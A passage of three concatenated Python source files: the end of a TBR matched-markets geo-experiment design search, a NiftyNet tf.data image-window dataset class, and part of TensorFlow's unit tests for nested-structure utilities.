neighboring_control_group)): # pytype: disable=wrong-arg-types
continue
neighbor_design = tbrmmdiagnostics.TBRMMDiagnostics(
treatment_time_series, self.parameters)
neighbor_design.x = self.data.aggregate_time_series(
neighboring_control_group)
req_impact = neighbor_design.required_impact
req_budget = req_impact / self.parameters.iroas
if (budget_range is not None) and (self._constraint_not_satisfied(
req_budget, budget_range[0], budget_range[1])):
continue
score = TBRMMScore(neighbor_design)
if score > current_score:
group_ctl_tmp = neighboring_control_group
current_score = score
if current_score > TBRMMScore(current_design):
group_ctl = group_ctl_tmp
else:
group_star_ctl[k] = group_ctl_tmp
score_star[k] = current_score
needs_matching = False
# add one geo to treatment given the current control group
elif k < max_treatment_size:
r_treatment = self.geo_assignments.t - group_star_trt[k]
current_score = copy.deepcopy(tmp_score)
group_trt = group_star_trt[k]
for geo in r_treatment:
augmented_treatment_group = group_star_trt[k].union([geo])
updated_control_group = group_star_ctl[k] - set([geo])
# see comment on lines 566-567 for the same if statement
if (k >= self.parameters.treatment_geos_range[0]) and (
len(neighboring_control_group) <=
self.parameters.control_geos_range[1]):
if (not updated_control_group) or (
not self.design_within_constraints(augmented_treatment_group,
updated_control_group)):
continue
treatment_time_series = self.data.aggregate_time_series(
augmented_treatment_group)
neighbor_design = TBRMMDiagnostics(
treatment_time_series, self.parameters)
neighbor_design.x = self.data.aggregate_time_series(
updated_control_group)
req_impact = neighbor_design.required_impact
req_budget = req_impact / self.parameters.iroas
if (budget_range is not None) and (self._constraint_not_satisfied(
req_budget, budget_range[0], budget_range[1])):
continue
score = TBRMMScore(neighbor_design)
if score > current_score:
group_ctl = updated_control_group
group_trt = augmented_treatment_group
current_score = score
group_star_trt[k+1] = group_trt
k = k + 1
needs_matching = True
# if some geos are fixed to treatment, we did not check that the design
# with treatment group = {all geos fixed in treatment} and control group =
# {all geos that can be assigned to control} pass the diagnostic tests
if kappa_0 > 0:
diagnostic = TBRMMDiagnostics(
self.data.aggregate_time_series(group_star_trt[kappa_0]),
self.parameters)
diagnostic.x = self.data.aggregate_time_series(group_star_ctl[kappa_0])
req_impact = diagnostic.required_impact
req_budget = req_impact / self.parameters.iroas
if (not group_star_ctl[kappa_0]) or (not self.design_within_constraints(
group_star_trt[kappa_0], group_star_ctl[kappa_0])):
if (budget_range is not None) and (self._constraint_not_satisfied(
req_budget, budget_range[0], budget_range[1])):
group_star_trt.pop(kappa_0, None)
group_star_ctl.pop(kappa_0, None)
score_star.pop(kappa_0, None)
group_star_trt.pop(0, None)
group_star_ctl.pop(0, None)
score_star.pop(0, None)
for k in group_star_trt:
if self.design_within_constraints(group_star_trt[k], group_star_ctl[k]):
design_diag = TBRMMDiagnostics(
self.data.aggregate_time_series(group_star_trt[k]), self.parameters)
design_diag.x = self.data.aggregate_time_series(group_star_ctl[k])
design_score = TBRMMScore(design_diag)
design = TBRMMDesign(
design_score, group_star_trt[k], group_star_ctl[k],
copy.deepcopy(design_diag))
results.push(0, design)
self._search_results = results
return self.search_results()
|
|
# -*- coding: utf-8 -*-
"""
Creating ``tf.data.Dataset`` instance for image window sampler.
"""
from __future__ import absolute_import, division, print_function
import inspect
import numpy as np
import tensorflow as tf
# pylint: disable=no-name-in-module
from tensorflow.python.data.util import nest
from tensorflow.python.keras.utils import GeneratorEnqueuer
from niftynet.engine.image_window import ImageWindow, N_SPATIAL, \
LOCATION_FORMAT, BUFFER_POSITION_NP_TYPE
from niftynet.io.misc_io import squeeze_spatial_temporal_dim
from niftynet.layer.base_layer import Layer
from niftynet.utilities.util_common import look_up_operations
# when total number of window samples are not divisible by batch_size
# the class supports different modes for the final batch
# 'drop': drop the remainder batch
# 'pad': padding the final smaller batch with -1s
# 'dynamic': output the remainder directly (in this case the batch_size
# is undetermined at 'compile time')
SMALLER_FINAL_BATCH_MODE = {'drop', 'pad', 'dynamic'}
# pylint: disable=too-many-instance-attributes
class ImageWindowDataset(Layer):
"""
This class creates a ``tf.data.Dataset`` instance from
a sampler's layer_op function or generator.
If ``from_generator``, ``Dataset.from_generator`` interface will be used,
``Dataset.map`` interface will be used otherwise::
if the windows are from a image reader,
the total number of windows produced
will be: `epoch x n_subjects x windows_per_image`
if the windows are from a generator,
the total number of windows produced
will be: "iterations from the generator" x num_threads
"""
# pylint: disable=too-many-arguments
def __init__(self,
reader=None,
window_sizes=None,
batch_size=1,
windows_per_image=1,
queue_length=10,
shuffle=True,
epoch=-1,
smaller_final_batch_mode='pad',
seed=None,
name='image_dataset'):
Layer.__init__(self, name=name)
self._num_threads = 1
self._enqueuer = None
self._seed = seed
self.dataset = None
self.iterator = None
self.reader = reader
self.batch_size = batch_size
self.queue_length = int(max(queue_length, round(batch_size * 5.0)))
if self.queue_length > queue_length:
tf.logging.warning(
'sampler queue_length should be larger than batch_size, '
'defaulting to batch_size * 5.0 (%s).', self.queue_length)
self.from_generator = inspect.isgeneratorfunction(self.layer_op)
self.shuffle = shuffle
self.epoch = 1 if self.from_generator else epoch
self.smaller_final_batch_mode = look_up_operations(
smaller_final_batch_mode.lower(), SMALLER_FINAL_BATCH_MODE)
self.n_subjects = 1
self.window = None
if reader is not None:
self.window = ImageWindow.from_data_reader_properties(
reader.input_sources,
reader.shapes,
reader.tf_dtypes,
window_sizes or (-1, -1, -1))
self.n_subjects = reader.num_subjects
self.window.n_samples = windows_per_image
@property
def shapes(self):
"""
the sampler output (value of ``layer_op``) is::
[windows_per_image, x, y, z, 1, channels]
returns a dictionary of sampler output shapes
"""
assert self.window, 'Unknown output shapes: self.window not initialised'
return self.window.shapes
@property
def tf_shapes(self):
"""
returns a dictionary of sampler output tensor shapes
"""
assert self.window, 'Unknown output shapes: self.window not initialised'
return self.window.tf_shapes
@property
def tf_dtypes(self):
"""
returns a dictionary of sampler output tensorflow dtypes
"""
assert self.window, 'Unknown output dtypes: self.window not initialised'
return self.window.tf_dtypes
def set_num_threads(self, num_threads):
"""
Set number windows to generate in parallel.
"""
self._num_threads = int(num_threads)
def layer_op(self, idx=None):
"""
Generating each image as a window.
Overriding this function to create new image sampling strategies.
This function should either yield or return a dictionary
(of multiple windows per image)::
return a dictionary:
{
'image_name': a numpy array [n_samples, h, w, d, chn],
'image_name_location': [n_samples, 7]
}
where the 7-element location vector encode the image_id,
starting and ending coordinates of the image window.
Following the same notation, the dictionary can be extended
to multiple modalities; the keys will be::
{'image_name_1', 'image_name_1_location',
'image_name_2', 'image_name_2_location', ...}
:param idx: image_id used to load the image at the i-th row of
the input
:return: a image data dictionary
"""
image_id, image_data, _ = self.reader(idx=idx)
for mod in list(image_data):
spatial_shape = image_data[mod].shape[:N_SPATIAL]
coords = self.dummy_coordinates(image_id, spatial_shape, 1)
image_data[LOCATION_FORMAT.format(mod)] = coords
image_data[mod] = image_data[mod][np.newaxis, ...]
return image_data
# # The following is a demo of generator as the layer_op
# # Often we don't know the total number of elements that
# # will be generated, epoch is always 1.
# for idx in range(100):
# image_id, image_data, _ = self.reader()
# for mod in list(image_data):
# spatial_shape = image_data[mod].shape[:N_SPATIAL]
# coords = self.dummy_coordinates(image_id, spatial_shape, 1)
# image_data[LOCATION_FORMAT.format(mod)] = coords
# image_data[mod] = image_data[mod][np.newaxis, ...]
# yield image_data
def pop_batch_op(self):
"""
This function is used when connecting a sampler output
to a network. e.g.::
data_dict = self.get_sampler()[0].pop_batch_op(device_id)
net_output = net_model(data_dict['image'], is_training)
.. caution::
Note it squeezes the output tensor of 6 dims
``[batch, x, y, z, time, modality]``
by removing all dims along which length is one.
:return: a dictionary of image window tensors.
"""
if self.dataset is None or self.iterator is None:
# in case `run_threads` is not called,
# here we initialise the dataset and iterator
self.init_dataset()
self.iterator = self.dataset.make_one_shot_iterator()
# self.iterator = tf.data.Iterator.from_structure(
# self.dataset.output_types, self.dataset.output_shapes)
window_output = self.iterator.get_next()
for name in window_output:
window_output[name] = squeeze_spatial_temporal_dim(
window_output[name])
return window_output
def init_dataset(self):
"""
Make a window samples dataset from the reader and layer_op.
This function sets ``self.dataset``.
:return:
"""
if not self.from_generator:
dataset = self._dataset_from_range()
else:
dataset = self._dataset_from_generator()
self.dataset = self.dataset_preprocessing(dataset)
def dataset_preprocessing(self, dataset):
"""
dataset: batch and shuffle
:param dataset: a `tf.data.Dataset` instance
:return: a `tf.data.Dataset` instance
"""
dataset = dataset.repeat(self.epoch)
dataset = dataset.prefetch(buffer_size=self.queue_length)
if self.shuffle:
# locally shuffle the buffer of image windows
dataset = dataset.shuffle(
buffer_size=self.queue_length, seed=self._seed)
if self.smaller_final_batch_mode == 'drop':
# drop the remainder if there's not enough windows to
# form a batch, so that we have a fixed batch size.
# dataset = dataset.apply(tf.contrib.data.batch_and_drop_remainder(
# batch_size=self.batch_size))
# new API since TF 1.10
dataset = dataset.batch(batch_size=self.batch_size,
drop_remainder=True)
return dataset
dataset = dataset.batch(batch_size=self.batch_size)
if self.smaller_final_batch_mode == 'dynamic' and self.batch_size > 1:
return dataset
# self.smaller_final_batch_mode is 'pad'
# if self.batch_size == 1 no actual padding
# but this function will set the output shapes properly.
def _pad_batch(batch_size):
def _pad_batch_func(input_tensor_dict):
"""
function to pad the batch dim to `batch_size`.
(assuming the input dataset is a dictionary-based one)
"""
out_dict = {}
for in_name in list(input_tensor_dict):
in_var = input_tensor_dict[in_name]
var_shape = in_var.shape.as_list()
if batch_size > 1:
paddings = [[0, 0] for _ in in_var.shape]
paddings[0][1] = batch_size - tf.shape(in_var)[0]
in_var = tf.pad(
in_var, paddings, "CONSTANT", constant_values=-1)
var_shape[0] = batch_size
in_var.set_shape(var_shape)
out_dict[in_name] = in_var
return out_dict
return _pad_batch_func
dataset = dataset.map(_pad_batch(self.batch_size))
return dataset
# pylint: disable=redefined-variable-type
def _dataset_from_range(self):
"""
This function maps a dataset of integers to a dataset of images.
:return: a `tf.data.Dataset`
"""
# dataset: a list of integers
tf.logging.info(
'Initialising Dataset from %s subjects...', self.n_subjects)
dataset = tf.data.Dataset.range(self.n_subjects)
if self.shuffle:
# global shuffle of the entire set of subjects
dataset = dataset.shuffle(
buffer_size=self.n_subjects, seed=self._seed)
# dataset: map each integer i to n windows sampled from subject i
def _tf_wrapper(idx):
flattened_types = nest.flatten(self.tf_dtypes)
flattened_shapes = nest.flatten(self.tf_shapes)
flat_values = tf.py_func(
func=lambda subject_id: nest.flatten(self(subject_id)),
inp=[idx],
Tout=flattened_types)
for ret_t, shape in zip(flat_values, flattened_shapes):
# the actual returned numpy array shapes are not checked
ret_t.set_shape(shape)
return nest.pack_sequence_as(self.tf_dtypes, flat_values)
dataset = dataset.map(_tf_wrapper, num_parallel_calls=self._num_threads)
# dataset: slice the n-element window into n single windows
dataset = dataset.flat_map(map_func=tf.data.Dataset.from_tensor_slices)
return dataset
def _dataset_from_generator(self):
"""
Create a `tf.data.Dataset` from a layer_op (as a generator).
:return: a `tf.data.Dataset`
"""
tf.logging.info('Initialising dataset from generator...')
if self._num_threads < 2 or not self.shuffle:
window_generator = self
else:
# self._enqueuer = GeneratorEnqueuer(
# self(),
# use_multiprocessing=True,
# wait_time=0.01,
# seed=self._seed)
self._enqueuer = GeneratorEnqueuer(
self(),
use_multiprocessing=True)
self._enqueuer.start(
workers=self._num_threads, max_queue_size=self.queue_length)
window_generator = self._enqueuer.get
# dataset from generator
dataset = tf.data.Dataset.from_generator(
generator=window_generator,
output_types=self.tf_dtypes,
output_shapes=self.tf_shapes)
# dataset: slice the n-element window into n single windows
dataset = dataset.flat_map(map_func=tf.data.Dataset.from_tensor_slices)
return dataset
def run_threads(self, *_args, **_kwargs):
"""
This function is created for compatibility purposes
(Deprecating)
:param _args:
:param _kwargs:
:return:
"""
pass
# if self.dataset is None or self.iterator is None:
# self.init_dataset()
# self.iterator = self.dataset.make_one_shot_iterator()
# self.iterator = tf.data.Iterator.from_structure(
# self.dataset.output_types, self.dataset.output_shapes)
# sess = session or tf.get_default_session()
# if sess is not None:
# sess.run(self.iterator.make_initializer(self.dataset))
def close_all(self):
"""
For compatibility with the queue-based sampler.
"""
if self._enqueuer is not None:
self._enqueuer.stop()
@classmethod
def dummy_coordinates(cls, image_id, image_sizes, n_samples):
"""
This function returns a set of image window coordinates
which are just spatially from 0 to `image_sizes`.
:return: a numpy array of `n_samples` spatial coordinates
"""
starting_coordinates = [0, 0, 0]
image_spatial_shape = list(image_sizes[:N_SPATIAL])
coords = [image_id] + starting_coordinates + image_spatial_shape
coords = np.tile(np.asarray(coords), [n_samples, 1])
return coords.astype(BUFFER_POSITION_NP_TYPE)
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for utilities working with arbitrarily nested structures."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import time
from absl.testing import parameterized
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
from tensorflow.python.util import nest
from tensorflow.python.util.compat import collections_abc
try:
import attr # pylint:disable=g-import-not-at-top
except ImportError:
attr = None
class _CustomMapping(collections_abc.Mapping):
def __init__(self, *args, **kwargs):
self._wrapped = dict(*args, **kwargs)
def __getitem__(self, key):
return self._wrapped[key]
def __iter__(self):
return iter(self._wrapped)
def __len__(self):
return len(self._wrapped)
class _CustomSequenceThatRaisesException(collections.Sequence):
def __len__(self):
return 1
def __getitem__(self, item):
raise ValueError("Cannot get item: %s" % item)
class NestTest(parameterized.TestCase, test.TestCase):
PointXY = collections.namedtuple("Point", ["x", "y"]) # pylint: disable=invalid-name
unsafe_map_pattern = ("nest cannot guarantee that it is safe to map one to "
"the other.")
bad_pack_pattern = ("Attempted to pack value:\n .+\ninto a sequence, but "
"found incompatible type `<(type|class) 'str'>` instead.")
if attr:
class BadAttr(object):
"""Class that has a non-iterable __attrs_attrs__."""
__attrs_attrs__ = None
@attr.s
class SampleAttr(object):
field1 = attr.ib()
field2 = attr.ib()
@attr.s
class UnsortedSampleAttr(object):
field3 = attr.ib()
field1 = attr.ib()
field2 = attr.ib()
@test_util.assert_no_new_pyobjects_executing_eagerly
def testAttrsFlattenAndPack(self):
if attr is None:
self.skipTest("attr module is unavailable.")
field_values = [1, 2]
sample_attr = NestTest.SampleAttr(*field_values)
self.assertFalse(nest._is_attrs(field_values))
self.assertTrue(nest._is_attrs(sample_attr))
flat = nest.flatten(sample_attr)
self.assertEqual(field_values, flat)
restructured_from_flat = nest.pack_sequence_as(sample_attr, flat)
self.assertIsInstance(restructured_from_flat, NestTest.SampleAttr)
self.assertEqual(restructured_from_flat, sample_attr)
# Check that flatten fails if attributes are not iterable
with self.assertRaisesRegexp(TypeError, "object is not iterable"):
flat = nest.flatten(NestTest.BadAttr())
@parameterized.parameters(
{"values": [1, 2, 3]},
{"values": [{"B": 10, "A": 20}, [1, 2], 3]},
{"values": [(1, 2), [3, 4], 5]},
{"values": [PointXY(1, 2), 3, 4]},
)
@test_util.assert_no_new_pyobjects_executing_eagerly
def testAttrsMapStructure(self, values):
if attr is None:
self.skipTest("attr module is unavailable.")
structure = NestTest.UnsortedSampleAttr(*values)
new_structure = nest.map_structure(lambda x: x, structure)
self.assertEqual(structure, new_structure)
@test_util.assert_no_new_pyobjects_executing_eagerly
def testFlattenAndPack(self):
structure = ((3, 4), 5, (6, 7, (9, 10), 8))
flat = ["a", "b", "c", "d", "e", "f", "g", "h"]
self.assertEqual(nest.flatten(structure), [3, 4, 5, 6, 7, 9, 10, 8])
self.assertEqual(
nest.pack_sequence_as(structure, flat), (("a", "b"), "c",
("d", "e", ("f", "g"), "h")))
structure = (NestTest.PointXY(x=4, y=2),
((NestTest.PointXY(x=1, y=0),),))
flat = [4, 2, 1, 0]
self.assertEqual(nest.flatten(structure), flat)
restructured_from_flat = nest.pack_sequence_as(structure, flat)
self.assertEqual(restructured_from_flat, structure)
self.assertEqual(restructured_from_flat[0].x, 4)
self.assertEqual(restructured_from_flat[0].y, 2)
self.assertEqual(restructured_from_flat[1][0][0].x, 1)
self.assertEqual(restructured_from_flat[1][0][0].y, 0)
self.assertEqual([5], nest.flatten(5))
self.assertEqual([np.array([5])], nest.flatten(np.array([5])))
self.assertEqual("a", nest.pack_sequence_as(5, ["a"]))
self.assertEqual(
np.array([5]), nest.pack_sequence_as("scalar", [np.array([5])]))
with self.assertRaisesRegexp(
ValueError, self.unsafe_map_pattern):
nest.pack_sequence_as("scalar", [4, 5])
with self.assertRaisesRegexp(TypeError, self.bad_pack_pattern):
nest.pack_sequence_as([4, 5], "bad_sequence")
with self.assertRaises(ValueError):
nest.pack_sequence_as([5, 6, [7, 8]], ["a", "b", "c"])
@parameterized.parameters({"mapping_type": collections.OrderedDict},
{"mapping_type": _CustomMapping})
@test_util.assert_no_new_pyobjects_executing_eagerly
def testFlattenDictOrder(self, mapping_type):
"""`flatten` orders dicts by key, including OrderedDicts."""
ordered = mapping_type([("d", 3), ("b", 1), ("a", 0), ("c", 2)])
plain = {"d": 3, "b": 1, "a": 0, "c": 2}
ordered_flat = nest.flatten(ordered)
plain_flat = nest.flatten(plain)
self.assertEqual([0, 1, 2, 3], ordered_flat)
self.assertEqual([0, 1, 2, 3], plain_flat)
@parameterized.parameters({"mapping_type": collections.OrderedDict},
{"mapping_type": _CustomMapping})
def testPackDictOrder(self, mapping_type):
"""Packing orders dicts by key, including OrderedDicts."""
custom = mapping_type([("d", 0), ("b", 0), ("a", 0), ("c", 0)])
plain = {"d": 0, "b": 0, "a": 0, "c": 0}
seq = [0, 1, 2, 3]
custom_reconstruction = nest.pack_sequence_as(custom, seq)
plain_reconstruction = nest.pack_sequence_as(plain, seq)
self.assertIsInstance(custom_reconstruction, mapping_type)
self.assertIsInstance(plain_reconstruction, dict)
self.assertEqual(
mapping_type([("d", 3), ("b", 1), ("a", 0), ("c", 2)]),
custom_reconstruction)
self.assertEqual({"d": 3, "b": 1, "a": 0, "c": 2}, plain_reconstruction)
@test_util.assert_no_new_pyobjects_executing_eagerly
def testFlattenAndPackMappingViews(self):
"""`flatten` orders dicts by key, including OrderedDicts."""
ordered = collections.OrderedDict([("d", 3), ("b", 1), ("a", 0), ("c", 2)])
# test flattening
ordered_keys_flat = nest.flatten(ordered.keys())
ordered_values_flat = nest.flatten(ordered.values())
ordered_items_flat = nest.flatten(ordered.items())
self.assertEqual([3, 1, 0, 2], ordered_values_flat)
self.assertEqual(["d", "b", "a", "c"], ordered_keys_flat)
self.assertEqual(["d", 3, "b", 1, "a", 0, "c", 2], ordered_items_flat)
# test packing
self.assertEqual([("d", 3), ("b", 1), ("a", 0), ("c", 2)],
nest.pack_sequence_as(ordered.items(), ordered_items_flat))
Abc = collections.namedtuple("A", ("b", "c")) # pylint: disable=invalid-name
@test_util.assert_no_new_pyobjects_executing_eagerly
def testFlattenAndPack_withDicts(self):
# A nice messy mix of tuples, lists, dicts, and `OrderedDict`s.
mess = [
"z",
NestTest.Abc(3, 4), {
"d": _CustomMapping({
41: 4
}),
"c": [
1,
collections.OrderedDict([
("b", 3),
("a", 2),
]),
],
"b": 5
}, 17
]
flattened = nest.flatten(mess)
self.assertEqual(flattened, ["z", 3, 4, 5, 1, 2, 3, 4, 17])
structure_of_mess = [
14,
NestTest.Abc("a", True),
{
"d": _CustomMapping({
41: 42
}),
"c": [
0,
collections.OrderedDict([
("b", 9),
("a", 8),
]),
],
"b": 3
},
"hi everybody",
]
unflattened = nest.pack_sequence_as(structure_of_mess, flattened)
self.assertEqual(unflattened, mess)
# Check also that the OrderedDict was created, with the correct key order.
unflattened_ordered_dict = unflattened[2]["c"][1]
self.assertIsInstance(unflattened_ordered_dict, collections.OrderedDict)
self.assertEqual(list(unflattened_ordered_dict.keys()), ["b", "a"])
unflattened_custom_mapping = unflattened[2]["d"]
self.assertIsInstance(unflattened_custom_mapping, _CustomMapping)
self.assertEqual(list(unflattened_custom_mapping.keys()), [41])
def testFlatten_numpyIsNotFlattened(self):
structure = np.array([1, 2, 3])
flattened = nest.flatten(structure)
self.assertLen(flattened, 1)
def testFlatten_stringIsNotFlattened(self):
structure = "lots of letters"
flattened = nest.flatten(structure)
self.assertLen(flattened, 1)
unflattened = nest.pack_sequence_as("goodbye", flattened)
self.assertEqual(structure, unflattened)
def testPackSequenceAs_notIterableError(self):
with self.assertRaisesRegexp(
TypeError, self.bad_pack_pattern):
nest.pack_sequence_as("hi", "bye")
def testPackSequenceAs_wrongLengthsError(self):
with self.assertRaisesRegexp(
ValueError,
"Structure had 2 elements, but flat_sequence had 3 elements."):
nest.pack_sequence_as(["hello", "world"],
["and", "goodbye", "again"])
@test_util.assert_no_new_pyobjects_executing_eagerly
def testIsNested(self):
self.assertFalse(nest.is_nested("1234"))
self.assertTrue(nest.is_nested([1, 3, [4, 5]]))
self.assertTrue(nest.is_nested(((7, 8), (5, 6))))
self.assertTrue(nest.is_nested([]))
self.assertTrue(nest.is_nested({"a": 1, "b": 2}))
self.assertTrue(nest.is_nested({"a": 1, "b": 2}.keys()))
self.assertTrue(nest.is_nested({"a": 1, "b": 2}.values()))
self.assertTrue(nest.is_nested({"a": 1, "b": 2}.items()))
self.assertFalse(nest.is_nested(set([1, 2])))
ones = array_ops.ones([2, 3])
self.assertFalse(nest.is_nested(ones))
self.assertFalse(nest.is_nested(math_ops.tanh(ones)))
self.assertFalse(nest.is_nested(np.ones((4, 5))))
@parameterized.parameters({"mapping_type": _CustomMapping},
{"mapping_type": dict})
def testFlattenDictItems(self, mapping_type):
dictionary = mapping_type({(4, 5, (6, 8)): ("a", "b", ("c", "d"))})
flat = {4: "a", 5: "b", 6: "c", 8: "d"}
self.assertEqual(nest.flatten_dict_items(dictionary), flat)
with self.assertRaises(TypeError):
nest.flatten_dict_items(4)
bad_dictionary = mapping_type({(4, 5, (4, 8)): ("a", "b", ("c", "d"))})
with self.assertRaisesRegexp(ValueError, "not unique"):
nest.flatten_dict_items(bad_dictionary)
another_bad_dictionary = mapping_type({
(4, 5, (6, 8)): ("a", "b", ("c", ("d", "e")))
})
with self.assertRaisesRegexp(
ValueError, "Key had [0-9]* elements, but value had [0-9]* elements"):
nest.flatten_dict_items(another_bad_dictionary)
# pylint does not correctly recognize these as class names and
# suggests to use variable style under_score naming.
# pylint: disable=invalid-name
Named0ab = collections.namedtuple("named_0", ("a", "b"))
Named1ab = collections.namedtuple("named_1", ("a", "b"))
SameNameab = collections.namedtuple("same_name", ("a", "b"))
SameNameab2 = collections.namedtuple("same_name", ("a", "b"))
SameNamexy = collections.namedtuple("same_name", ("x", "y"))
SameName1xy = collections.namedtuple("same_name_1", ("x", "y"))
SameName1xy2 = collections.namedtuple("same_name_1", ("x", "y"))
NotSameName = collections.namedtuple("not_same_name", ("a", "b"))
# pylint: enable=invalid-name
class SameNamedType1(SameNameab):
pass
@test_util.assert_no_new_pyobjects_executing_eagerly
def testAssertSameStructure(self):
structure1 = (((1, 2), 3), 4, (5, 6))
structure2 = ((("foo1", "foo2"), "foo3"), "foo4", ("foo5", "foo6"))
structure_different_num_elements = ("spam", "eggs")
structure_different_nesting = (((1, 2), 3), 4, 5, (6,))
nest.assert_same_structure(structure1, structure2)
nest.assert_same_structure("abc", 1.0)
nest.assert_same_structure("abc", np.array([0, 1]))
nest.assert_same_structure("abc", constant_op.constant([0, 1]))
with self.assertRaisesRegexp(
ValueError,
("The two structures don't have the same nested structure\\.\n\n"
"First structure:.*?\n\n"
"Second structure:.*\n\n"
"More specifically: Substructure "
r'"type=tuple str=\(\(1, 2\), 3\)" is a sequence, while '
'substructure "type=str str=spam" is not\n'
"Entire first structure:\n"
r"\(\(\(\., \.\), \.\), \., \(\., \.\)\)\n"
"Entire second structure:\n"
r"\(\., \.\)")):
nest.assert_same_structure(structure1, structure_different_num_elements)
with self.assertRaisesRegexp(
ValueError,
("The two structures don't have the same nested structure\\.\n\n"
"First structure:.*?\n\n"
"Second structure:.*\n\n"
r'More specifically: Substructure "type=list str=\[0, 1\]" '
r'is a sequence, while substructure "type=ndarray str=\[0 1\]" '
"is not")):
nest.assert_same_structure([0, 1], np.array([0, 1]))
with self.assertRaisesRegexp(
ValueError,
("The two structures don't have the same nested structure\\.\n\n"
"First structure:.*?\n\n"
"Second structure:.*\n\n"
r'More specifically: Substructure "type=list str=\[0, 1\]" '
'is a sequence, while substructure "type=int str=0" '
"is not")):
nest.assert_same_structure(0, [0, 1])
self.assertRaises(TypeError, nest.assert_same_structure, (0, 1), [0, 1])
with self.assertRaisesRegexp(
ValueError,
("don't have the same nested structure\\.\n\n"
"First structure: .*?\n\nSecond structure: ")):
nest.assert_same_structure(structure1, structure_different_nesting)
self.assertRaises(TypeError, nest.assert_same_structure, (0, 1),
NestTest.Named0ab("a", "b"))
nest.assert_same_structure(NestTest.Named0ab(3, 4),
NestTest.Named0ab("a", "b"))
self.assertRaises(TypeError, nest.assert_same_structure,
NestTest.Named0ab(3, 4), NestTest.Named1ab(3, 4))
with self.assertRaisesRegexp(
ValueError,
("don't have the same nested structure\\.\n\n"
"First structure: .*?\n\nSecond structure: ")):
nest.assert_same_structure(NestTest.Named0ab(3, 4),
NestTest.Named0ab([3], 4))
with self.assertRaisesRegexp(
ValueError,
("don't have the same nested structure\\.\n\n"
"First structure: .*?\n\nSecond structure: ")):
nest.assert_same_structure([[3], 4], [3, [4]])
structure1_list = [[[1, 2], 3], 4, [5, 6]]
with self.assertRaisesRegexp(TypeError,
"don't have the same sequence type"):
nest.assert_same_structure(structure1, structure1_list)
nest.assert_same_structure(structure1, structure2, check_types=False)
nest.assert_same_structure(structure1, structure1_list, check_types=False)
with self.assertRaisesRegexp(ValueError,
"don't have the same set of keys"):
nest.assert_same_structure({"a": 1}, {"b": 1})
nest.assert_same_structure(NestTest.SameNameab(0, 1),
NestTest.SameNameab2(2, 3))
# This assertion is expected to pass: two namedtuples with the same
# name and field names are considered to be identical.
nest.assert_same_structure(
NestTest.SameNameab(NestTest.SameName1xy(0, 1), 2),
NestTest.SameNameab2(NestTest.SameName1xy2(2, 3), 4))
expected_message = "The two structures don't have the same.*"
with self.assertRaisesRegexp(ValueError, expected_message):
nest.assert_same_structure(
NestTest.SameNameab(0, NestTest.SameNameab2(1, 2)),
NestTest.SameNameab2(NestTest.SameNameab(0, 1), 2))
self.assertRaises(TypeError, nest.assert_same_structure,
NestTest.SameNameab(0, 1), NestTest.NotSameName(2, 3))
self.assertRaises(TypeError, nest.assert_same_structure,
NestTest.SameNameab(0, 1), NestTest.SameNamexy(2, 3))
self.assertRaises(TypeError, nest.assert_same_structure,
NestTest.SameNameab(0, 1), NestTest.SameNamedType1(2, 3))
EmptyNT = collections.namedtuple("empty_nt", "") # pylint: disable=invalid-name
def testHeterogeneousComparison(self):
nest.assert_same_structure({"a": 4}, _CustomMapping(a=3))
nest.assert_same_structure(_CustomMapping(b=3), {"b": 4})
@test_util.assert_no_new_pyobjects_executing_eagerly
def testMapStructure(self):
structure1 = (((1, 2), 3), 4, (5, 6))
structure2 = (((7, 8), 9), 10, (11, 12))
structure1_plus1 = nest.map_structure(lambda x: x + 1, structure1)
nest.assert_same_structure(structure1, structure1_plus1)
self.assertAllEqual(
[2, 3, 4, 5, 6, 7],
nest.flatten(structure1_plus1))
structure1_plus_structure2 = nest.map_structure(
lambda x, y: x + y, structure1, structure2)
self.assertEqual(
(((1 + 7, 2 + 8), 3 + 9), 4 + 10, (5 + 11, 6 + 12)),
structure1_plus_structure2)
self.assertEqual(3, nest.map_structure(lambda x: x - 1, 4))
self.assertEqual(7, nest.map_structure(lambda x, y: x + y, 3, 4))
structure3 = collections.defaultdict(list)
structure3["a"] = [1, 2, 3, 4]
structure3["b"] = [2, 3, 4, 5]
expected_structure3 = collections.defaultdict(list)
expected_structure3["a"] = [2, 3, 4, 5]
expected_structure3["b"] = [3, 4, 5, 6]
self.assertEqual(expected_structure3,
nest.map_structure(lambda x: x + 1, structure3))
# Empty structures
self.assertEqual((), nest.map_structure(lambda x: x + 1, ()))
self.assertEqual([], nest.map_structure(lambda x: x + 1, []))
self.assertEqual({}, nest.map_structure(lambda x: x + 1, {}))
self.assertEqual(NestTest.EmptyNT(), nest.map_structure(lambda x: x + 1,
NestTest.EmptyNT()))
# This is checking actual equality of types, empty list != empty tuple
self.assertNotEqual((), nest.map_structure(lambda x: x + 1, []))
with self.assertRaisesRegexp(TypeError, "callable"):
nest.map_structure("bad", structure1_plus1)
with self.assertRaisesRegexp(ValueError, "at least one structure"):
nest.map_structure(lambda x: x)
with self.assertRaisesRegexp(ValueError, "same number of elements"):
nest.map_structure(lambda x, y: None, (3, 4), (3, 4, 5))
with self.assertRaisesRegexp(ValueError, "same nested structure"):
nest.map_structure(lambda x, y: None, 3, (3,))
with self.assertRaisesRegexp(TypeError, "same sequence type"):
nest.map_structure(lambda x, y: None, ((3, 4), 5), [(3, 4), 5])
with self.assertRaisesRegexp(ValueError, "same nested structure"):
nest.map_structure(lambda x, y: None, ((3, 4), 5), (3, (4, 5)))
structure1_list = [[[1, 2], 3], 4, [5, 6]]
with self.assertRaisesRegexp(TypeError, "same sequence type"):
nest.map_structure(lambda x, y: None, structure1, structure1_list)
nest.map_structure(lambda x, y: None, structure1, structure1_list,
check_types=False)
with self.assertRaisesRegexp(ValueError, "same nested structure"):
